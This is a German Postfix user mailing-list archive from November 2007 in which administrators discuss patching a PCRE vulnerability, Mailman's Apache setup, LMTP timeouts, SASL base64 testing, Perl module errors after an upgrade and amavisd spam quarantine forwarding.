* Patrick Ben Koetter

: > Heise berichtet in "Schwachstellen in Perl und Regular-Expressions-Bibliothek" > , die "Regular Expression Engine > der Skriptsprache Perl weist eine Schwachstelle auf, die zum Absturz einer > damit geschriebenen Anwendung oder sogar zum Einschleusen von Code führen > kann." Ich habe den falschen Teil zitiert, der sich auf PERL alleine bezieht. Im Artikel wird auch die pcre-Library als fehlerhaft beschrieben. > > Postfix nutzt die pcre-Library, für den pcre-Map-Type, um damit z.B. header- > oder body-checks durchzuführen. > > > Woran erkennt man, ob Postfix die pcre-Library eingebunden hat? > Der Aufruf von 'postconf -m' listet den pcre-Map-Type, wenn die pcre-Library > eingebunden ist: > > $ postconf -m > ... > pcre > ... > > > Was tun? > Update über Distribution durchführen oder die (offizielle) Version 7.4 auf > laden, bauen und installieren. > > p at rick > > > -- > Postfix - Einrichtung, Betrieb und Wartung > > saslfinger (debugging SMTP AUTH): > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From Ralf.Hildebrandt at charite.de Tue Nov 6 14:24:44 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Tue, 6 Nov 2007 14:24:44 +0100 Subject: [Postfixbuch-users] Achtung: Schwachstellen in PCRE In-Reply-To: <20071106131627.GB22556@state-of-mind.de> References: <20071106131627.GB22556@state-of-mind.de> Message-ID: <20071106132444.GU10835@charite.de> * Patrick Ben Koetter

: > Heise berichtet in "Schwachstellen in Perl und Regular-Expressions-Bibliothek" > , die "Regular Expression Engine > der Skriptsprache Perl weist eine Schwachstelle auf, die zum Absturz einer > damit geschriebenen Anwendung oder sogar zum Einschleusen von Code führen > kann." > > Postfix nutzt die pcre-Library, für den pcre-Map-Type, um damit z.B. header- > oder body-checks durchzuführen. > > > Woran erkennt man, ob Postfix die pcre-Library eingebunden hat? > Der Aufruf von 'postconf -m' listet den pcre-Map-Type, wenn die pcre-Library > eingebunden ist: > > $ postconf -m > ... > pcre > ... Man ist allerdings nur betroffen, wenn man pcre auch nutzt: postconf | fgrep pcre: Und auch nur, wenn man andere Leute regular expressions eingeben läßt: "allow attackers to execute arbitrary code by compiling specially crafted regular expressions" D.h. im Normalfall ist man nicht betroffen. -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de "It's always nice to see USA set the edgy standards. First for freedom, then for the police state." From mluser at rbmail.ch Tue Nov 6 14:27:47 2007 From: mluser at rbmail.ch (Andre Keller) Date: Tue, 06 Nov 2007 14:27:47 +0100 Subject: [Postfixbuch-users] Achtung: Schwachstellen in PCRE In-Reply-To: <20071106132444.GU10835@charite.de> References: <20071106131627.GB22556@state-of-mind.de> <20071106132444.GU10835@charite.de> Message-ID: <47306BD3.60509@rbmail.ch> Ralf Hildebrandt schrieb: > * Patrick Ben Koetter

: > >> Heise berichtet in "Schwachstellen in Perl und Regular-Expressions-Bibliothek" >> , die "Regular Expression Engine >> der Skriptsprache Perl weist eine Schwachstelle auf, die zum Absturz einer >> damit geschriebenen Anwendung oder sogar zum Einschleusen von Code führen >> kann. Ist dass das selbe Problem? http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00177.html dann geht es meinen Servern gut... Gruss André From sven at root2.schroederhost.de Tue Nov 6 14:33:54 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Tue, 06 Nov 2007 14:33:54 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mailman_und_Oberfl=E4che?= In-Reply-To: <47306779.2040507@thoma.cc> References: <47304683.4050009@root2.schroederhost.de> <47306779.2040507@thoma.cc> Message-ID: <47306D42.2020105@root2.schroederhost.de> Maximilian Thoma schrieb: > sind die scripts für den user mit dem apache betrieben wird ausführbar > bzw. gehören die scripts dem user ? > > z.b. www-data ?? > Sie gehören root und der Gruppe list. /usr/lib/cgi-bin/mailman# -rwxr-sr-x 1 root list 8616 2007-02-28 22:37 admin www-data gehört jetzt auch zu list > ist der parameter NameVirtualHost gesetzt wenn ja was steht da drin ? > NameVirtualHost ist nur 1x für den Default-Host auf die externe IP gesetzt. > > was gibt apache2 -S aus ? > VirtualHost configuration: 10.6.6.5:* is a NameVirtualHost default server root3.server.local (/etc/apache2/sites-enabled/000-default:2) port * namevhost lists1.server.local (/etc/apache2/sites-enabled/list1.conf:1) Syntax OK Der Browser zeigt nur nen leeren Index an... From Ralf.Hildebrandt at charite.de Tue Nov 6 14:35:23 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Tue, 6 Nov 2007 14:35:23 +0100 Subject: [Postfixbuch-users] Achtung: Schwachstellen in PCRE In-Reply-To: <47306BD3.60509@rbmail.ch> References: <20071106131627.GB22556@state-of-mind.de> <20071106132444.GU10835@charite.de> <47306BD3.60509@rbmail.ch> Message-ID: <20071106133523.GX10835@charite.de> * Andre Keller : > Ist dass das selbe Problem? > http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00177.html Ja -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de To rephrase, spam is not the answer. Spam is the question. Death is not the answer, but pretty close to it. From nospam at thoma.cc Tue Nov 6 14:49:40 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Tue, 06 Nov 2007 14:49:40 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mailman_und_Oberfl=E4che?= In-Reply-To: <47306D42.2020105@root2.schroederhost.de> References: <47304683.4050009@root2.schroederhost.de> <47306779.2040507@thoma.cc> <47306D42.2020105@root2.schroederhost.de> Message-ID: <473070F4.3020707@thoma.cc> Sven Schmidt schrieb: > Maximilian Thoma schrieb: >> sind die scripts für den user mit dem apache betrieben wird ausführbar >> bzw. gehören die scripts dem user ? >> >> z.b. www-data ?? >> > Sie gehören root und der Gruppe list. > /usr/lib/cgi-bin/mailman# > -rwxr-sr-x 1 root list 8616 2007-02-28 22:37 admin > www-data gehört jetzt auch zu list >> ist der parameter NameVirtualHost gesetzt wenn ja was steht da drin ? >> > NameVirtualHost ist nur 1x für den Default-Host auf die externe IP gesetzt. >> was gibt apache2 -S aus ? >> > VirtualHost configuration: > 10.6.6.5:* is a NameVirtualHost > default server root3.server.local (/etc/apache2/sites-enabled/000-default:2) > port * namevhost lists1.server.local (/etc/apache2/sites-enabled/list1.conf:1) > Syntax OK > > > > Der Browser zeigt nur nen leeren Index an... mod_perl / mod_cgi beide enabled ? local:/etc/apache2/mods-enabled# ls -la cgi.load perl.load lrwxrwxrwx 1 root root 36 2007-04-12 07:46 cgi.load -> /etc/apache2/mods-available/cgi.load lrwxrwxrwx 1 root root 37 2007-04-12 07:46 perl.load -> /etc/apache2/mods-available/perl.load im vhost muss cgi noch aktiviert werden. ala beispiel im 000-default ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ AllowOverride None Options ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all evtl. falsches directory index im vhost wie heissen die dateien ??? DirectoryIndex index.htm index.html index.shtml start.htm start.html start.shtm index.php sind die perlscripts ausführbar ? chmod g+x datei da www-data ja mitglied bei list ist. und dann nochmal testen. -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From nospam at thoma.cc Tue Nov 6 15:02:42 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Tue, 06 Nov 2007 15:02:42 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mailman_und_Oberfl=E4che?= In-Reply-To: <473070F4.3020707@thoma.cc> References: <47304683.4050009@root2.schroederhost.de> <47306779.2040507@thoma.cc> <47306D42.2020105@root2.schroederhost.de> <473070F4.3020707@thoma.cc> Message-ID: <47307402.1070104@thoma.cc> Maximilian Thoma schrieb: > Sven Schmidt schrieb: >> Maximilian Thoma schrieb: >>> sind die scripts für den user mit dem apache betrieben wird ausführbar >>> bzw. gehören die scripts dem user ? >>> >>> z.b. www-data ?? >>> >> Sie gehören root und der Gruppe list. >> /usr/lib/cgi-bin/mailman# >> -rwxr-sr-x 1 root list 8616 2007-02-28 22:37 admin >> www-data gehört jetzt auch zu list >>> ist der parameter NameVirtualHost gesetzt wenn ja was steht da drin ? >>> >> NameVirtualHost ist nur 1x für den Default-Host auf die externe IP gesetzt. >>> was gibt apache2 -S aus ? >>> >> VirtualHost configuration: >> 10.6.6.5:* is a NameVirtualHost >> default server root3.server.local (/etc/apache2/sites-enabled/000-default:2) >> port * namevhost lists1.server.local (/etc/apache2/sites-enabled/list1.conf:1) >> Syntax OK >> >> >> >> Der Browser zeigt nur nen leeren Index an... > > mod_perl / mod_cgi beide enabled ? > local:/etc/apache2/mods-enabled# ls -la cgi.load perl.load > lrwxrwxrwx 1 root root 36 2007-04-12 07:46 cgi.load -> > /etc/apache2/mods-available/cgi.load > lrwxrwxrwx 1 root root 37 2007-04-12 07:46 perl.load -> > /etc/apache2/mods-available/perl.load > > im vhost muss cgi noch aktiviert werden. ala beispiel im 000-default > > ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ > > AllowOverride None > Options ExecCGI -MultiViews +SymLinksIfOwnerMatch > Order allow,deny > Allow from all > > > evtl. falsches directory index im vhost wie heissen die dateien ??? > > DirectoryIndex index.htm index.html index.shtml start.htm start.html > start.shtm index.php > > sind die perlscripts ausführbar ? > chmod g+x datei > da www-data ja mitglied bei list ist. > > und dann nochmal testen. > > > evtl. auch mal howto durchsehen http://blog.netzpiraten.ch/mailman-fur-postfixmysql-unter-ubuntu/ -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From sven at root2.schroederhost.de Tue Nov 6 15:20:02 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Tue, 06 Nov 2007 15:20:02 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mailman_und_Oberfl=E4che?= In-Reply-To: <47307402.1070104@thoma.cc> References: <47304683.4050009@root2.schroederhost.de> <47306779.2040507@thoma.cc> <47306D42.2020105@root2.schroederhost.de> <473070F4.3020707@thoma.cc> <47307402.1070104@thoma.cc> Message-ID: <47307812.70604@root2.schroederhost.de> Maximilian Thoma schrieb: > evtl. auch mal howto durchsehen > > http://blog.netzpiraten.ch/mailman-fur-postfixmysql-unter-ubuntu/ > > ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/mailman/ DirectoryIndex /cgi-bin/admin index.html zeigt jetzt wenigstens den Index mit den Listen richtig an, auf auf die Listen selbst kann man nicht drauf weil der Link nicht stimmt. From nospam at thoma.cc Tue Nov 6 15:24:04 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Tue, 06 Nov 2007 15:24:04 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mailman_und_Oberfl=E4che?= In-Reply-To: <47307812.70604@root2.schroederhost.de> References: <47304683.4050009@root2.schroederhost.de> <47306779.2040507@thoma.cc> <47306D42.2020105@root2.schroederhost.de> <473070F4.3020707@thoma.cc> <47307402.1070104@thoma.cc> <47307812.70604@root2.schroederhost.de> Message-ID: <47307904.7050801@thoma.cc> Sven Schmidt schrieb: > Maximilian Thoma schrieb: >> evtl. auch mal howto durchsehen >> >> http://blog.netzpiraten.ch/mailman-fur-postfixmysql-unter-ubuntu/ >> >> > > ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/mailman/ > DirectoryIndex /cgi-bin/admin index.html > > zeigt jetzt wenigstens den Index mit den Listen richtig an, auf auf die > Listen selbst kann man nicht drauf weil der Link nicht stimmt. > damit sollte es eigentlich klappen #Mailman cgi Script für das Webinterface ScriptAlias /mailman/ /usr/lib/cgi-bin/mailman/ ScriptAlias /cgi-bin/mailman/ /usr/lib/cgi-bin/mailman/ AllowOverride None Options ExecCGI Order allow,deny Allow from all #Öffentliches pipermail archiv Alias /pipermail/ /var/lib/mailman/archives/public Options Indexes MultiViews FollowSymLinks AllowOverride None Order allow,deny #Bilder für Mailman Alias /images/mailman/ /usr/share/images/mailman/ AllowOverride None Order allow,deny Allow from all -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From ah at ordix.de Tue Nov 6 15:32:21 2007 From: ah at ordix.de (Alexander Hochhalter) Date: Tue, 06 Nov 2007 15:32:21 +0100 Subject: [Postfixbuch-users] lmtp ... read timeout Message-ID: <47307AF5.7010705@ordix.de> Hallo zusammen, ich habe seit 2004 ein Imap Server am laufen, der hat auch brav sein Dienst verrichtet. Seit paar Woche bekomme ich immer öfters folgender Fehler: /var/log/mail: postfix/lmtp[3692]: EF0F4A6E80: to= ... , status=deferred (connect to public/lmtp[public/lmtp]: read timeout) Die Emails sammeln sich dann in der Mailq. postqueue -f und rccyrus restart bringen dann alles wieder für paar Tagen in Ordnung. Was kann man dagegen machen und woher kommt der Fehler beim lmtp Danke Gruß Alex From sven at root2.schroederhost.de Tue Nov 6 16:20:33 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Tue, 06 Nov 2007 16:20:33 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mailman_und_Oberfl=E4che?= In-Reply-To: <47307904.7050801@thoma.cc> References: <47304683.4050009@root2.schroederhost.de> <47306779.2040507@thoma.cc> <47306D42.2020105@root2.schroederhost.de> <473070F4.3020707@thoma.cc> <47307402.1070104@thoma.cc> <47307812.70604@root2.schroederhost.de> <47307904.7050801@thoma.cc> Message-ID: <47308641.1020901@root2.schroederhost.de> Maximilian Thoma schrieb: > damit sollte es eigentlich klappen > > > #Mailman cgi Script für das Webinterface > ScriptAlias /mailman/ /usr/lib/cgi-bin/mailman/ > ScriptAlias /cgi-bin/mailman/ /usr/lib/cgi-bin/mailman/ > > AllowOverride None > Options ExecCGI > Order allow,deny > Allow from all > > > #Öffentliches pipermail archiv > Alias /pipermail/ /var/lib/mailman/archives/public > > Options Indexes MultiViews FollowSymLinks > AllowOverride None > Order allow,deny > > > #Bilder für Mailman > Alias /images/mailman/ /usr/share/images/mailman/ > > AllowOverride None > Order allow,deny > Allow from all > > > > ja fast, die Archive werden nicht gefunden From ml at awinkelmann.de Tue Nov 6 18:09:35 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Tue, 6 Nov 2007 18:09:35 +0100 Subject: [Postfixbuch-users] lmtp ... read timeout In-Reply-To: <47307AF5.7010705@ordix.de> References: <47307AF5.7010705@ordix.de> Message-ID: <200711061809.35681.ml@awinkelmann.de> On Dienstag, 6. November 2007, Alexander Hochhalter wrote: > ich habe seit 2004 ein Imap Server am laufen, der hat auch brav sein > Dienst verrichtet. > Seit paar Woche bekomme ich immer öfters folgender Fehler: > > /var/log/mail: > postfix/lmtp[3692]: EF0F4A6E80: to= ... , status=deferred (connect to > public/lmtp[public/lmtp]: read timeout) > > Die Emails sammeln sich dann in der Mailq. > > postqueue -f > und > rccyrus restart > > bringen dann alles wieder für paar Tagen in Ordnung. > > Was kann man dagegen machen und woher kommt der Fehler beim lmtp Was sagt das Log vom Cyrus-Imapd? -- Andreas From armin at townux.ch Tue Nov 6 18:35:20 2007 From: armin at townux.ch (Stoffel Armin) Date: Tue, 06 Nov 2007 18:35:20 +0100 Subject: [Postfixbuch-users] Postfix mit sasl2 und mysql In-Reply-To: <472F9DAA.9060106@townux.ch> References: <472F864D.7030207@townux.ch> <200711052241.48817.ml@awinkelmann.de> <472F8F4B.8060804@townux.ch> <200711052307.32493.ml@awinkelmann.de> <472F9DAA.9060106@townux.ch> Message-ID: <4730A5D8.90300@townux.ch> Hallo Doch noch eine frage: Wie mach ich das wenn mein Passwort eine zahl ist? Stoffel Armin schrieb: >Hallo > >sorry... du bist ein genie! >hatte eine zahl als erstes zeichen! >jetzt kommt ein anderer Fehler. > >Mal schauen ich ichs alleine finde > >Vielen dank!!!!!!!!!!!!!!! > >p.S. was meinst du mit TOFU? > >Andreas Winkelmann schrieb: > > > >>On Montag, 5. November 2007, Stoffel Armin wrote: >> >>Bitte kein TOFU. >> >> >> >> >> >>>Hab damit kein problem: >>> >>> >>> >>> >>Scheinbar schon, "bad protocol" und sowas wie "Can only find author/en (no >>password)" bedeuten mit dem Base64-String stimmt was nicht. >> >> >> >> >> >>>perl -MMIME::Base64 -e 'print encode_base64("user\0user\0passwort");' >>> >>> >>> >>> >>Bei perl vergessen die Leute meist die Sonderbedeutung von dem @-Zeichen in >>der Zeichenkette. Evtl fängt das Password aber auch mit ner Zahl an. >> >>Nimm die Zeichenkette, die Du erzeugt hast, lasse sie von perl wieder >>dekodieren (decode_base64) und staune. >> >> >> >> >> >>>>Wenn Du Probleme damit hast diese Base64-Zeichenkette zu erzeugen, benutze >>>>am besten einen richtigen MUA zum testen. >>>> >>>> >>>> >>>> >> >> >> >> > > > > From p at state-of-mind.de Tue Nov 6 18:39:13 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Tue, 6 Nov 2007 18:39:13 +0100 Subject: [Postfixbuch-users] Postfix mit sasl2 und mysql In-Reply-To: <4730A5D8.90300@townux.ch> References: <472F864D.7030207@townux.ch> <200711052241.48817.ml@awinkelmann.de> <472F8F4B.8060804@townux.ch> <200711052307.32493.ml@awinkelmann.de> <472F9DAA.9060106@townux.ch> <4730A5D8.90300@townux.ch> Message-ID: <20071106173913.GB27390@state-of-mind.de> * Stoffel Armin : > Hallo > > Doch noch eine frage: Wie mach ich das wenn mein Passwort eine zahl ist? > > Stoffel Armin schrieb: > > >Hallo > > > >sorry... du bist ein genie! > >hatte eine zahl als erstes zeichen! > >jetzt kommt ein anderer Fehler. > > > >Mal schauen ich ichs alleine finde > > > >Vielen dank!!!!!!!!!!!!!!! > > > >p.S. was meinst du mit TOFU? > > > >Andreas Winkelmann schrieb: > > > > > > > >>On Montag, 5. November 2007, Stoffel Armin wrote: > >> > >>Bitte kein TOFU. > >> > >> > >> > >> > >> > >>>Hab damit kein problem: > >>> > >>> > >>> > >>> > >>Scheinbar schon, "bad protocol" und sowas wie "Can only find author/en (no > >>password)" bedeuten mit dem Base64-String stimmt was nicht. > >> > >> > >> > >> > >> > >>>perl -MMIME::Base64 -e 'print encode_base64("user\0user\0passwort");' > >>> > >>> > >>> > >>> > >>Bei perl vergessen die Leute meist die Sonderbedeutung von dem @-Zeichen in > >>der Zeichenkette. Evtl fängt das Password aber auch mit ner Zahl an. > >> > >>Nimm die Zeichenkette, die Du erzeugt hast, lasse sie von perl wieder > >>dekodieren (decode_base64) und staune. > >> > >> > >> > >> > >> > >>>>Wenn Du Probleme damit hast diese Base64-Zeichenkette zu erzeugen, benutze > >>>>am besten einen richtigen MUA zum testen. > >>>> > >>>> > >>>> > >>>> > >> > >> > >> > >> > > > > > > > > > > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From ml at awinkelmann.de Tue Nov 6 18:47:40 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Tue, 6 Nov 2007 18:47:40 +0100 Subject: [Postfixbuch-users] Postfix mit sasl2 und mysql In-Reply-To: <4730A5D8.90300@townux.ch> References: <472F864D.7030207@townux.ch> <472F9DAA.9060106@townux.ch> <4730A5D8.90300@townux.ch> Message-ID: <200711061847.40583.ml@awinkelmann.de> On Dienstag, 6. November 2007, Stoffel Armin wrote: Das mit dem TOFU hatten wir schon?! > Doch noch eine frage: Wie mach ich das wenn mein Passwort eine zahl ist? > >>>perl -MMIME::Base64 -e 'print encode_base64("user\0user\0passwort");' Perl muss erkennen können, wann die \xxx Zahl zu ende ist. Eine voll ausgeschriebene 0 wäre "\000". Also bei "1Password" - "\0001Password". > >>>>Wenn Du Probleme damit hast diese Base64-Zeichenkette zu erzeugen, > >>>> benutze am besten einen richtigen MUA zum testen. -- Andreas From usenet at deiszner.de Tue Nov 6 22:16:27 2007 From: usenet at deiszner.de (Sebastian Deiszner) Date: Tue, 06 Nov 2007 22:16:27 +0100 Subject: [Postfixbuch-users] Achtung: Schwachstellen in PCRE In-Reply-To: <20071106133523.GX10835@charite.de> References: <20071106131627.GB22556@state-of-mind.de> <20071106132444.GU10835@charite.de> <47306BD3.60509@rbmail.ch> <20071106133523.GX10835@charite.de> Message-ID: <4730D9AB.1000609@deiszner.de> Ralf Hildebrandt schrieb: > * Andre Keller : > >> Ist dass das selbe Problem? >> http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00177.html > > Ja > #aptitude upgrade Reading package lists... Done Building dependency tree... Done Reading extended state information Initializing package states... Done Building tag database... Done The following packages will be upgraded: libpcre3 1 packages upgraded, 0 newly installed, 0 to remove and 0 not upgraded. Need to get 198kB of archives. After unpacking 4096B will be used. Do you want to continue? [Y/n/?] Ist nach diesem Upgrade das Problem behoben? From driessen at fblan.de Tue Nov 6 22:18:43 2007 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 6 Nov 2007 22:18:43 +0100 Subject: [Postfixbuch-users] Achtung: Schwachstellen in PCRE In-Reply-To: <4730D9AB.1000609@deiszner.de> References: <20071106131627.GB22556@state-of-mind.de> <20071106132444.GU10835@charite.de><47306BD3.60509@rbmail.ch> <20071106133523.GX10835@charite.de> <4730D9AB.1000609@deiszner.de> Message-ID: <000001c820ba$9ce469c0$0565a8c0@uwe> Sebastian Deiszner schrieb: > > #aptitude upgrade > Reading package lists... Done > Building dependency tree... Done > Reading extended state information > Initializing package states... Done > Building tag database... Done > The following packages will be upgraded: > libpcre3 > 1 packages upgraded, 0 newly installed, 0 to remove and 0 not upgraded. > Need to get 198kB of archives. After unpacking 4096B will be used. > Do you want to continue? [Y/n/?] > > Ist nach diesem Upgrade das Problem behoben? Sollte so sein (man weis ja nie welche neuen Bugs damit auftauchen *gg) Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From jk at jkart.de Wed Nov 7 03:25:17 2007 From: jk at jkart.de (Jim Knuth) Date: Wed, 07 Nov 2007 03:25:17 +0100 Subject: [Postfixbuch-users] Riesiger Perl Fehler nach Upgrade Message-ID: <4731220D.30806@jkart.de> Hallo, ich hab heute ein Upgrade bei Debian gemacht, unter anderem Perl. Seitdem startet Amavis nicht mehr und auch CPAN macht auch Zicken. Es werden fehlende Module in Zeile 171 "angemeckert". --snip BEGIN { fetch_modules('REQUIRED BASIC MODULES', 1, qw( Exporter POSIX Fcntl Socket Errno Carp Time::HiRes IO::Handle IO::File IO::Socket IO::Socket::UNIX IO::Socket::INET IO::Wrap IO::Stringy Digest::MD5 Unix::Syslog File::Basename Compress::Zlib MIME::Base64 MIME::QuotedPrint MIME::Words MIME::Head MIME::Body MIME::Entity MIME::Parser MIME::Decoder MIME::Decoder::Base64 MIME::Decoder::Binary MIME::Decoder::QuotedPrint MIME::Decoder::NBit MIME::Decoder::UU MIME::Decoder::Gzip64 Net::Server Net::Server::PreFork --snap CPAN sagt: --snip Errno architecture (i486-linux-gnu-thread-multi-2.6.18.3) does not match executable architecture ... --snap Hab`n paar Seiten mit nem Perlbug gefunden, die mich aber nicht weiter bringen. Weiss jemand einen Rat? Danke. -- mit freundlichen Gruessen - with kind regard Jim Knuth #ICQ 277289867 From p at state-of-mind.de Wed Nov 7 08:25:41 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Wed, 7 Nov 2007 08:25:41 +0100 Subject: [Postfixbuch-users] Riesiger Perl Fehler nach Upgrade In-Reply-To: <4731220D.30806@jkart.de> References: <4731220D.30806@jkart.de> Message-ID: <20071107072541.GA8168@state-of-mind.de> * Jim Knuth : > Hallo, > > ich hab heute ein Upgrade bei Debian gemacht, unter anderem Perl. > Seitdem startet Amavis nicht mehr und auch CPAN macht auch > Zicken. Es werden fehlende Module in Zeile 171 "angemeckert". @INC-Pfade anders setzen? > > --snip > BEGIN { > fetch_modules('REQUIRED BASIC MODULES', 1, qw( > Exporter POSIX Fcntl Socket Errno Carp Time::HiRes > IO::Handle IO::File IO::Socket IO::Socket::UNIX IO::Socket::INET > IO::Wrap IO::Stringy Digest::MD5 Unix::Syslog File::Basename > Compress::Zlib MIME::Base64 MIME::QuotedPrint MIME::Words > MIME::Head MIME::Body MIME::Entity MIME::Parser MIME::Decoder > MIME::Decoder::Base64 MIME::Decoder::Binary > MIME::Decoder::QuotedPrint > MIME::Decoder::NBit MIME::Decoder::UU MIME::Decoder::Gzip64 > Net::Server Net::Server::PreFork > --snap > > CPAN sagt: > > --snip > Errno architecture (i486-linux-gnu-thread-multi-2.6.18.3) does > not match executable architecture ... > --snap > > Hab`n paar Seiten mit nem Perlbug gefunden, die mich aber nicht > weiter bringen. Weiss jemand einen Rat? Danke. > -- > mit freundlichen Gruessen - with kind regard > Jim Knuth > #ICQ 277289867 > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From p at state-of-mind.de Wed Nov 7 08:31:36 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Wed, 7 Nov 2007 08:31:36 +0100 Subject: [Postfixbuch-users] Riesiger Perl Fehler nach Upgrade In-Reply-To: <4731220D.30806@jkart.de> References: <4731220D.30806@jkart.de> Message-ID: <20071107073136.GC8168@state-of-mind.de> * Jim Knuth : > Hallo, > > ich hab heute ein Upgrade bei Debian gemacht, unter anderem Perl. > Seitdem startet Amavis nicht mehr und auch CPAN macht auch > Zicken. Es werden fehlende Module in Zeile 171 "angemeckert". > > --snip > BEGIN { > fetch_modules('REQUIRED BASIC MODULES', 1, qw( > Exporter POSIX Fcntl Socket Errno Carp Time::HiRes > IO::Handle IO::File IO::Socket IO::Socket::UNIX IO::Socket::INET > IO::Wrap IO::Stringy Digest::MD5 Unix::Syslog File::Basename > Compress::Zlib MIME::Base64 MIME::QuotedPrint MIME::Words > MIME::Head MIME::Body MIME::Entity MIME::Parser MIME::Decoder > MIME::Decoder::Base64 MIME::Decoder::Binary > MIME::Decoder::QuotedPrint > MIME::Decoder::NBit MIME::Decoder::UU MIME::Decoder::Gzip64 > Net::Server Net::Server::PreFork > --snap Findest Du die Module denn, wenn Du mit folgendem Kommando eine Liste der Module erstellen läßt? $ perldoc perllocal p at rick > > CPAN sagt: > > --snip > Errno architecture (i486-linux-gnu-thread-multi-2.6.18.3) does > not match executable architecture ... > --snap > > Hab`n paar Seiten mit nem Perlbug gefunden, die mich aber nicht > weiter bringen. Weiss jemand einen Rat? Danke. > -- > mit freundlichen Gruessen - with kind regard > Jim Knuth > #ICQ 277289867 > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From ch.grau at gmx.de Wed Nov 7 10:32:29 2007 From: ch.grau at gmx.de (Christian Grau) Date: Wed, 07 Nov 2007 10:32:29 +0100 Subject: [Postfixbuch-users] spam an eine Mailadresse weiterleiten Message-ID: <20071107093229.267620@gmx.net> hallo liste, ich benutze postfix + amavisd + clamav + spamassasin. wie kann ich die erkannten spam - mail, welche als *.gz in /var/virusmails abgelegt werden an eine zentrale mailadresse senden. dieser empfaenger soll so noch einmal alle mails pruefen koennen ob es wirklich spam mails sind. vielen dank christian grau -- GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS. Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail From oliver.hoffmann at helmholtz-hzi.de Wed Nov 7 11:02:38 2007 From: oliver.hoffmann at helmholtz-hzi.de (Oliver Hoffmann) Date: Wed, 07 Nov 2007 11:02:38 +0100 Subject: [Postfixbuch-users] spam an eine Mailadresse weiterleiten In-Reply-To: <20071107093229.267620@gmx.net> References: <20071107093229.267620@gmx.net> Message-ID: <47318D3E.8050805@helmholtz-hzi.de> Christian Grau schrieb: > hallo liste, > > ich benutze postfix + amavisd + clamav + spamassasin. > wie kann ich die erkannten spam - mail, welche als *.gz in /var/virusmails > abgelegt werden an eine zentrale mailadresse senden. dieser empfaenger soll so noch einmal alle mails pruefen koennen ob es wirklich spam mails sind. > $spam_quarantine_to = 'your-email at address.com'; Grüße, Oliver -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 3297 bytes Beschreibung: S/MIME Cryptographic Signature URL : From kildau-ml at gmx.de Wed Nov 7 11:04:37 2007 From: kildau-ml at gmx.de (Chris Cohen) Date: Wed, 7 Nov 2007 11:04:37 +0100 Subject: [Postfixbuch-users] smtp_sender_dependent_* + gmail Message-ID: <200711071104.37894.kildau-ml@gmx.de> Hi, 